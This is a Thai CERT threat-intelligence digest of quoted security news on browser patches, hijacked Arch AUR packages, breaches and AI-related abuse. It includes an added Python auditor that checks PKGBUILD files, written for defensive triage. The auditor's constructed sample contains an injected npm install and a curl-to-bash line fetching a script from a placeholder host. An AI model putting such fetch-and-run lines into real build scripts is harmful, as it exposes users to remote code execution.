NCSA Webboard
    Cyber Threat Intelligence 15 June 2026

    Cyber Security News
      NCSA_THAICERT

      Vulnerabilities

      • Chrome 149 Update Patches 28 Vulnerabilities
        "Google on Thursday rolled out a Chrome 149 update that resolves 28 critical and high-severity vulnerabilities. The update patches five critical-severity bugs: use-after-free issues in Core, DigitalCredentials, and WebMIDI, an insufficient validation of untrusted input flaw in Accessibility, and a heap buffer overflow defect in GPU. The remaining 23 vulnerabilities are high-severity flaws: nine use-after-free, four insufficient validation of untrusted input, three inappropriate implementation, two insufficient policy enforcement, two out-of-bounds read, an out-of-bounds write, a race condition, and a heap buffer overflow."
        https://www.securityweek.com/chrome-149-update-patches-28-vulnerabilities/
      • CISA Adds One Known Exploited Vulnerability To Catalog
        "CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
        CVE-2026-35273 Oracle PeopleSoft Enterprise PeopleTools Missing Authentication for Critical Function Vulnerability"
        https://www.cisa.gov/news-events/alerts/2026/06/12/cisa-adds-one-known-exploited-vulnerability-catalog
        https://securityaffairs.com/193574/security/u-s-cisa-adds-oracle-peoplesoft-enterprise-peopletools-flaw-to-its-known-exploited-vulnerabilities-catalog.html
      • Marking Your Own Homework (Check Point Remote Access VPN IKEv1 Authentication Bypass CVE-2026-50751)
        "It is yet another day in this parallel universe of security, where the devices we bolt onto the edge of our networks to keep the bad people out are, with remarkable consistency, the exact thing that let the bad people in. While we’ve seemingly had a breather from traditional SSL VPN exploitation season (you know, the one where every edge appliance vendor takes it in turns to have a very bad week), it’s now time to pull up a chair and welcome ourselves back to another group therapy session."
        https://labs.watchtowr.com/marking-your-own-homework-check-point-remote-access-vpn-ikev1-authentication-bypass-cve-2026-50751/
        https://www.helpnetsecurity.com/2026/06/12/cve-2026-50751-poc-exploit/
      • Microsoft Has Mostly Repaired Flaw In Surface Hardware That Allowed Unprotected Devices To Be Bricked By a Single Packet
        "For the past 90 days, Microsoft has been quietly patching a firmware flaw in Surface devices that allowed the hardware to be bricked with a single packet, though only for those who have disabled Secure Core and Secure Boot. And the company's Copilot AI software inadvertently helped identify the faulty firmware. According to Jack Darcy, a security researcher based in Australia, his instance of Microsoft Copilot stumbled across the bug after being asked to adjust the screen backlighting on a Surface device. The Copilot-conjured Python script ended up rendering the researcher's laptop inoperable by overwriting the embedded controller firmware."
        https://www.theregister.com/security/2026/06/12/microsoft-has-mostly-repaired-flaw-in-surface-hardware-that-allowed-unprotected-devices-to-be-bricked-by-a-single-packet/5253895
      • 21,786 Home Cameras, No Password, No Warning
        "In May 2026, Mysterium VPN queried a public internet-wide device index to count every camera and recorder that answers the open internet. They found more than three million reachable devices. Of those, 21,786 were streaming live video to anyone who pointed a browser at them, with no login, no challenge, and no warning to the person on the other side of the lens. That number is a floor, not a ceiling. Two brands dominate the internet-reachable camera market: Hikvision and Dahua together account for most of the three million. But the headline figure isn’t about them."
        https://securityaffairs.com/193536/hacking/21786-home-cameras-no-password-no-warning.html

      Malware

      • Over 400 Arch Linux Packages Compromised To Push Rootkit, Infostealer
        "More than 400 packages in the Arch User Repository (AUR) are distributing a Linux rootkit and infostealer malware targeting credentials and access tokens. A report from the open-source intelligence community Independent Federated Intelligence Network (IFIN) notes that a new maintainer is spoofing a trusted publisher on the AUR platform to push infected packages. The Arch Linux distribution is popular among power users and developers, using the AUR catalog to provide the latest versions for installed software, drivers, and the kernel."
        https://www.bleepingcomputer.com/news/security/over-400-arch-linux-packages-compromised-to-push-rootkit-infostealer/
        https://discourse.ifin.network/t/400-aur-packages-compromised-with-infostealer-and-rootkit/577
        https://thehackernews.com/2026/06/over-400-arch-linux-aur-packages.html
      • Borrowed Trust – Systematic Exploitation Of Abandoned Cloud DNS Delegations To Serve Thai Gambling SEO Content
        "Cyble Research & Intelligence Labs (CRIL) has identified an active SEO poisoning campaign exploiting abandoned cloud DNS zone delegations to serve Thai-language gambling content under the domain authority of reputed enterprise organizations. The campaign has compromised 163 organizations across 30+ countries, spanning federal government agencies, national healthcare systems, financial institutions, critical infrastructure operators, and major universities."
        https://cyble.com/blog/borrowed-trust-cloud-dns-takeover-thai-gambling-seo-poisoning/
      • Atomic Arch: Attackers Hijack Trusted AUR Packages To Deliver Rootkit-Like Malware
        "Sonatype researchers uncovered Atomic Arch, a new campaign targeting orphaned packages in the Arch User Repository in which attackers take over legitimate, abandoned AUR projects and modify PKGBUILDS to install a malicious npm package during installation. This is especially concerning because the trusted package itself may not look obviously malicious. The attack hides behind build instructions, downstream dependencies, and existing developer trust."
        https://www.sonatype.com/blog/atomic-arch-npm-campaign-adds-malicious-dependency
        https://thehackernews.com/2026/06/400-arch-linux-aur-packages-hijacked-to.html
        https://hackread.com/atomic-arch-hijacks-linux-aur-packages-malware/
      • Velvet Ant’s Operation Highland: How a China-Nexus Actor Infiltrated An Internal Network Undetected
        "When Sygnia’s IR team began reconstructing the intrusion that would become known as Operation Highland, the earliest forensic artifacts dated back to 2016. What they uncovered was not a recent breach but a near-decade of undetected presence inside an internal network – a network the attacker had no direct path into, and reached anyway. Velvet Ant is a China-nexus threat actor Sygnia has tracked across multiple investigations. This is not an isolated campaign. In earlier research, we documented the group abusing F5 BIG-IP appliances and legacy Windows infrastructure to maintain long-term persistence. More recently, we reported on their exploitation of CVE-2024-20399, a zero-day in Cisco NX-OS, to deploy a hybrid backdoor (VELVETSHELL) directly on Cisco Nexus switches, and published a detailed advisory with detection and prevention guidance. The pattern across all these investigations is consistent: Velvet Ant escalates when detected, pivots to less-monitored infrastructure, and rebuilds persistence from a new vantage point."
        https://www.sygnia.co/blog/operation-highland-velvet-ant/
        https://thehackernews.com/2026/06/china-linked-hackers-backdoored-linux.html
        https://www.bleepingcomputer.com/news/security/chinese-hackers-hijack-auth-flow-spy-on-isolated-network-for-a-decade/
      • LABScon25 Replay | Gamaredon x Turla: Unveiling a 2025 Espionage Alliance Targeting Ukraine
        "In this LABScon 25 presentation, ESET researchers Matthieu Faou and Zoltán Rusnák present the first technical evidence that Gamaredon actively facilitated Turla’s access to high-value Ukrainian targets in Ukraine. Across incidents observed between February and June 2025, Gamaredon tooling, including PteroGraphin and PteroOdd, was used to deploy Turla’s Kazuar backdoor and, in at least one case, restore Turla’s access after the group appeared to have lost its foothold."
        https://www.sentinelone.com/labs/labscon25-replay-gamaredon-x-turla-unveiling-a-2025-espionage-alliance-targeting-ukraine/
      • Shai-Hulud Campaign Evolution: Miasma, Hades, And AI Scanner Evasion
        "Since Zscaler ThreatLabz published its analysis of Shai-Hulud V2 in November 2025, the campaign has continued to evolve in ways that distinguish it from more typical software supply chain attacks. Over the last six months, the activity expanded beyond npm into the Python Package Index (PyPI), shifted from maintainer-focused compromise to CI/CD abuse, undermined trust in Supply-chain Levels for Software Artifacts (SLSA) provenance and OpenID Connect (OIDC)-based publishing workflows without breaking their underlying cryptographic guarantees, extended execution into IDE configuration files, and introduced prompt injection designed to evade AI-based security scanners."
        https://www.zscaler.com/blogs/security-research/shai-hulud-campaign-evolution-miasma-hades-and-ai-scanner-evasion
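      The two AUR items above (the 400-package campaign and Atomic Arch) come down to the same thing: a PKGBUILD whose build or package step fetches and runs something the declared source=() array never covered, such as an extra `npm install` or a download piped into a shell. The heuristic auditor below is an added example, not Arch, AUR, Sonatype or IFIN tooling. The PKGBUILD it inspects is constructed (package name, hosts and maintainer are made up), and the patterns it flags are this example's own assumptions about what a hijacked PKGBUILD looks like, not a published indicator set.

```python
"""Heuristic audit of an AUR PKGBUILD for install-time code fetching.

Added example, not Arch/AUR tooling. SAMPLE_PKGBUILD is constructed:
package name, hosts and maintainer are made up, and the regexes encode
this example's own assumptions about a hijacked PKGBUILD (a registry
install or a piped-to-shell download inside a build step, plus an
unverifiable source checksum).
"""
import re
from dataclasses import dataclass

SAMPLE_PKGBUILD = r"""
# Maintainer: someone <someone@example.invalid>   (constructed sample)
pkgname=example-tool
pkgver=1.4.2
pkgrel=2
arch=('x86_64')
url="https://example.invalid/example-tool"
license=('MIT')
depends=('glibc')
makedepends=('nodejs' 'npm')
source=("$pkgname-$pkgver.tar.gz::https://example.invalid/releases/$pkgver.tar.gz")
sha256sums=('SKIP')

build() {
  cd "$srcdir/$pkgname-$pkgver"
  npm install --no-audit example-helper-cli
  make
}

package() {
  cd "$srcdir/$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
  curl -fsSL https://cdn.example.invalid/post-install.sh | bash
}
"""

# The same PKGBUILD with the injected lines removed and a real checksum.
CLEAN_PKGBUILD = (
    SAMPLE_PKGBUILD
    .replace("  npm install --no-audit example-helper-cli\n", "")
    .replace("  curl -fsSL https://cdn.example.invalid/post-install.sh | bash\n", "")
    .replace("sha256sums=('SKIP')", "sha256sums=('" + "0" * 64 + "')")
)

# A bash function definition such as `build() {` or `package() {`.
FUNC_RE = re.compile(r"^\s*(\w+)\s*\(\)\s*\{", re.M)
# A package manager contacting a registry from inside a build/package step.
PM_FETCH_RE = re.compile(
    r"\b(npm|npx|yarn|pnpm|pip3?|cargo|gem)\s+(install|add|exec|i)\b(?P<args>[^\n|;&]*)"
)
# A download piped straight into a shell.
PIPE_TO_SHELL_RE = re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")
# Any other network fetch that bypasses the source=() array.
FETCH_RE = re.compile(r"\b(curl|wget|git\s+clone)\b")
# The checksum array for the declared sources.
SUMS_RE = re.compile(r"^\s*((?:md5|sha\d+|b2)sums)=\((.*?)\)", re.M | re.S)


@dataclass
class Finding:
    severity: str  # high / medium / low
    where: str     # function name or variable that triggered it
    detail: str


def parse_functions(text: str) -> dict:
    """Return {function_name: body} by brace-matching each `name() {`."""
    funcs = {}
    for m in FUNC_RE.finditer(text):
        depth, i = 1, m.end()
        while i < len(text) and depth:
            depth += {"{": 1, "}": -1}.get(text[i], 0)
            i += 1
        funcs[m.group(1)] = text[m.end():i - 1]
    return funcs


def audit_pkgbuild(text: str) -> list:
    """Flag build-time fetches and unverifiable sources in a PKGBUILD."""
    findings = []
    for name, body in parse_functions(text).items():
        for line in body.splitlines():
            code = re.split(r"(?:^|\s)#", line)[0].strip()  # drop trailing comments
            if not code:
                continue
            if PIPE_TO_SHELL_RE.search(code):
                findings.append(Finding("high", f"{name}()", f"remote script piped into a shell: {code}"))
            elif FETCH_RE.search(code):
                findings.append(Finding("medium", f"{name}()", f"network fetch outside source=(): {code}"))
            m = PM_FETCH_RE.search(code)
            if m:
                # Explicit package arguments mean a dependency the upstream project
                # never declared; a bare `npm install` of the lockfile is merely noisy.
                explicit = [a for a in m.group("args").split() if not a.startswith("-")]
                sev = "high" if explicit else "low"
                findings.append(Finding(sev, f"{name}()", f"{m.group(1)} {m.group(2)} at build time: {code}"))
    sums = SUMS_RE.search(text)
    if sums and "SKIP" in sums.group(2):
        findings.append(Finding("medium", sums.group(1), "checksum is SKIP, so a swapped source tarball goes unnoticed"))
    return findings


if __name__ == "__main__":
    for f in audit_pkgbuild(SAMPLE_PKGBUILD):
        print(f"[{f.severity:6}] {f.where}: {f.detail}")
```

      Run against the constructed PKGBUILD this reports the explicit `npm install` in build(), the curl-to-bash in package(), and the SKIP checksum; the cleaned variant reports nothing. It is a triage aid for diffing a PKGBUILD update before `makepkg`, not a substitute for reading the diff: a hijacked package can also hide the fetch in an `install=` hook script or in the upstream tarball itself, which a PKGBUILD-only check does not see.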

      Breaches/Hacks/Leaks

      • Pharma Giant Novo Nordisk Discloses Breach Of Clinical Trials Data
        "Danish pharmaceutical giant Novo Nordisk, the world's largest producer of insulin, disclosed a data breach affecting patient information from some clinical trials. Founded in 1923, Novo Nordisk now employs around 67,900 people across 80 offices worldwide and is the maker of viral GLP-1 receptor agonist drugs Wegovy and Ozempic. The company revealed on Thursday that attackers gained access to its internal IT systems and data related to patients participating in some clinical trials, including their patient IDs (random alphanumeric strings) and information on trial participation, sex, year of birth, biomarkers, health/immunogenicity data, and lifestyle factors (e.g., smoking, alcohol use, BMI)."
        https://www.bleepingcomputer.com/news/security/pharmaceutical-giant-novo-nordisk-discloses-security-breach/
        https://www.theregister.com/security/2026/06/12/novo-nordisk-says-hackers-stole-clinical-trial-data/5254812
        https://www.bankinfosecurity.com/ozempic-drug-maker-loses-clinical-trial-data-in-hack-a-31962
      • Over 73,000 French Govt Employees Affected In Tchap Messenger Breach
        "The French government revealed that a recent breach of its Tchap encrypted messaging platform affects the accounts of over 73,000 employees in the French public sector. DINUM, the French government's digital affairs directorate, disclosed on Monday that a threat actor gained access to the Tchap platform using a compromised user account and notified France's data protection authority (CNIL) due to the potential exposure of personal data shared by some users. While it initially shared almost no details about what was exposed and how many people were affected by this breach, the DINUM disclosed in a subsequent update that the attackers may have accessed information shared by around 9% of all registered users on the platform."
        https://www.bleepingcomputer.com/news/security/french-govt-says-tchap-breach-affected-over-73-000-accounts/
      • Iranian Cyber Group Handala Claims Cal Water Hack
        "The Iran-linked threat actor Handala this week boasted to have hacked California Water Service (Cal Water), and published 5 gigabytes of data allegedly stolen from the US water utility. In a post on their blog, the hacking group said the intrusion was retaliation for recent US actions in Iran and claimed they had the ability to disrupt water access but chose not to. While the level of access Handala had has not been confirmed, threat intelligence company Dataminr says the threat actor likely hacked into Cal Water’s RTKBase instance, a GNSS base station platform, and then moved laterally to a billing system."
        https://www.securityweek.com/iranian-cyber-group-handala-claims-cal-water-hack/
        https://securityaffairs.com/193565/uncategorized/iran-linked-handala-breached-a-california-water-utility-it-could-have-done-worse-and-it-knows-that.html

      General News

      • Ukrainian National Pleads Guilty To Role In Conti Ransomware Operation
        "A Ukrainian national extradited from Ireland to the United States last year has pleaded guilty to conspiracy charges tied to the Conti ransomware operation. The U.S. Department of Justice announced Thursday that 44-year-old Oleksii Oleksiyovych Lytvynenko pleaded guilty to conspiracy to commit wire fraud for his role in Conti ransomware attacks conducted between 2021 and 2022. According to prosecutors, Lytvynenko and his co-conspirators deployed Conti ransomware on victim networks in the United States and abroad, stealing data and encrypting devices to extort Bitcoin ransom payments."
        https://www.bleepingcomputer.com/news/security/ukrainian-national-pleads-guilty-to-role-in-conti-ransomware-operation/
        https://cyberscoop.com/conti-ransomware-member-ukrainian-lytvynenko-guilty/
        https://hackread.com/extradited-ukrainian-admits-conti-ransomware-attacks/
        https://securityaffairs.com/193590/uncategorized/ukrainian-extradited-from-ireland-pleads-guilty-over-role-in-conti-ransomware-scheme.html
      • Google Sues Chinese Phishing Service Over Gemini Abuse
        "Google has sued a Chinese phishing-as-a-service provider Friday for providing tools and crash courses for using the company's artificial intelligence product to create more than a million scam websites. The cybercrime group used Google's AI coding agent Gemini to refine and customize phishing sites so they look as real as the original, tricking victims to input their credit card information, account credentials and other personal data, the company said."
        https://www.bankinfosecurity.com/google-sues-chinese-phishing-service-over-gemini-abuse-a-31957
        https://www.helpnetsecurity.com/2026/06/12/google-china-based-cybercrime-network-lawsuit/
      • How To Use NIST And ISO Frameworks To Govern AI Agents
        "Security leaders no longer need convincing that AI agents introduce risk. What’s missing is how to govern them once they move into production and begin operating autonomously across enterprise environments. AI agents already read sensitive documents, invoke internal APIs, trigger workflows, and make decisions that still require human judgment. From a security perspective, the most important shift is not their intelligence, but their behavior and intent, since they carry delegated authority, operate autonomously, and often hold more access than the humans they support."
        https://www.helpnetsecurity.com/2026/06/12/nist-iso-frameworks-govern-ai-agents/
      • The Assembly Line Behind 1.5 Million Malicious Domains
        "Attackers registered roughly 1.5 million malicious domains during the first five months of 2026. The registration patterns resemble industrial output. Most of the domains were created by attackers, put to use within weeks, and concentrated among a small set of registrars, top-level domains, and hosting providers. New research examined more than 1.5 million unique domains flagged on VirusTotal between January and May 2026. Each domain was flagged by at least five independent VirusTotal scanning engines and first appeared on the platform during the study window. The detections were combined with WHOIS registration records, passive DNS resolution data, and the Tranco popularity ranking of well-known sites."
        https://www.helpnetsecurity.com/2026/06/12/malicious-domain-registration-research/
        https://arxiv.org/pdf/2606.11111
      • AI Sovereignty Makes Data Centers Strategic Targets For Cyber Operations
        "Data centers built for frontier AI draw hundreds of megawatts of electricity and large volumes of cooling water from fixed locations with known addresses. Each one concentrates tens of thousands of graphics processors, liquid cooling systems, and high-density power equipment inside a single building. This physical footprint turns a nation’s AI capability into something an adversary can locate, measure, and degrade."
        https://www.helpnetsecurity.com/2026/06/12/ai-sovereignty-data-centers/
        https://arxiv.org/pdf/2606.07245
      • Over 80% Of Sports Organizations Targeted By Hackers In The Last Year
        "Over 80% of professional sports organizations were targeted by cyber-attacks during the last year and over half of them were hit more than once, researchers have warned. In a report published on June 11, the day the FIFA World Cup 2026 kicked off, figures from Darktrace revealed that 84% of sports organizations – including teams, venues and event bodies – were targeted by cyber-attacks during the last year. And for most of them, facing a cyber-attack was not a one-off event: 57% experienced multiple cyber incidents in the 12-month period."
        https://www.infosecurity-magazine.com/news/sports-organizations-targeted-by/
      • How We're Combatting AI Scams With Security, Legislation And More
        "You’ve seen the texts: fake package alerts, urgent bank warnings, panicked messages about your compromised account. Behind them is an AI-powered cybercrime network built to steal your passwords and credit cards. Today, we’re fighting back. We’re filing a lawsuit to dismantle their infrastructure, coordinating with the FBI who will be taking law enforcement actions, and will continue to work with AT&T, T-Mobile and Verizon to block these texts before they reach you. Litigation alone won’t end this. So Google is also advocating for federal legislation to make these protections permanent."
        https://blog.google/innovation-and-ai/technology/safety-security/combatting-ai-scams/
        https://thehackernews.com/2026/06/google-sues-chinese-smishing-network.html
        https://www.theregister.com/security/2026/06/12/google-fires-sueball-at-alleged-chinese-phishers-over-ai-powered-fraud-ops/5254841
        https://cyberscoop.com/outsider-cybercrime-network-takedown-china-fbi-google-lumen/
      • Statement On The US Government Directive To Suspend Access To Fable 5 And Mythos 5
        "The US government, citing national security authorities, has issued an export control directive to suspend all access to Fable 5 and Mythos 5 by any foreign national, whether inside or outside the United States, including foreign national Anthropic employees. The net effect of this order is that we must abruptly disable Fable 5 and Mythos 5 for all our customers to ensure compliance. Access to all other Anthropic models will not be affected."
        https://www.anthropic.com/news/fable-mythos-access
        https://www.bleepingcomputer.com/news/security/us-gov-asks-anthropic-to-ban-foreign-national-access-to-fable-mythos/
        https://thehackernews.com/2026/06/us-orders-anthropic-to-suspend-fable-5.html
        https://www.bankinfosecurity.com/us-pulls-plug-on-anthropics-top-ai-models-a-31964
        https://cyberscoop.com/us-government-anthropic-fable-5-mythos-5-export-controls/
        https://www.securityweek.com/anthropic-says-it-has-taken-its-latest-ai-models-offline-to-comply-with-new-export-controls/
        https://securityaffairs.com/193579/ai/washington-pulled-the-plug-on-anthropic-fable-5-and-mythos-5-models.html
      • Tracing Digital Intent: New MacOS Tahoe 26 Artifact Discovered
        "Forensic examiners are constantly hunting for data that reveals not just what happened on a system, but the user's intent behind it. With the release of macOS Tahoe 26, a new artifact has surfaced that provides exactly this level of granularity. We have identified a new Biome stream, App.MenuItem, which logs specific menu selections made by users across the operating system. This artifact offers a step-by-step record of user actions — from compressing files to emptying the trash — providing critical context for user activity across the operating system. This blog outlines where to find this artifact, how to process it and what stories the data can tell."
        https://unit42.paloaltonetworks.com/new-macos-artifact-discovered/

      References
      Electronic Transactions Development Agency (ETDA)
